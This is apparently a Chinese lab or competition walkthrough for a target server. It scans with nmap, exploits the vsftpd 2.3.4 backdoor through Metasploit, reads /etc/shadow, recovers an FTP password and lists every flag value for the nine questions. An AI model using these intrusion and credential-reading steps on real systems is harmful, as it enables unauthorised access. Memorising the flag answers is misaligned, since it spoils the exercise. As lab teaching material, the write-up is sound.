服务器场景:PYsystem004
服务器场景操作系统:未知
服务器用户名:未知密码:未知
1.通过渗透机Kali对靶机服务器进行系统服务及版本扫描渗透测试,并将该操作显示结果中21端口对应的服务版本信息字符串作为Flag值提交;
nmap -sV -p- 靶机IP地址
flag:vsftpd 2.3.4
2.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp文件的文件名称作为Flag值提交;
输入msfconsole,搜索第一题版本字符串,使用vsftpd2.3.4漏洞(渗透成功)
set RHOSTS 靶机IP
exploit
cd /var/www
ls
flag:1097c4f5d.bmp
3.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp的图片文件中的英文单词作为Flag值提交;
我是用的cat /etc/shadow 复制的哈希密码
密码破解 太慢了
密码是admin123!@#
然后直接登录ftp就行了
cd /var/www
ls -la
直接get 1097c4f5d.bmp
然后在root文件夹里可以看到
打不开的话直接拖主机里看行了
4.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/home/guest目录中唯一一个后缀为.pdf文件的文件名称作为Flag值提交;
cd /home/guest
flag:499c1097c4f5d
5.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/home/guest目录中唯一一个后缀为.pdf文件的文件内容作为Flag值提交;
flag:157eb9ce33644ada6d0499c1097c4f5d
6.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/vsftpd目录中唯一一个后缀为.docx文件的文件名称作为Flag值提交;
cd /var/vsftpd
flag:358dc0044
7.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/vsftpd目录中唯一一个后缀为.docx文件的文件内容作为Flag值提交;
get 358dc0044.docx
flag:59b466fd93164953e56bdd1358dc0044
8.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/root目录中唯一一个后缀为.txt文件的文件名称作为Flag值提交;
cd /root
ls -la
flag:93e8a5f7a
9.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/root目录中唯一一个后缀为.txt文件的文件内容作为Flag值提交。
文件内容我直接去ssh去查看
flag:2bbfa55dc58149cbdc795d293e8a5f7a
私信随时回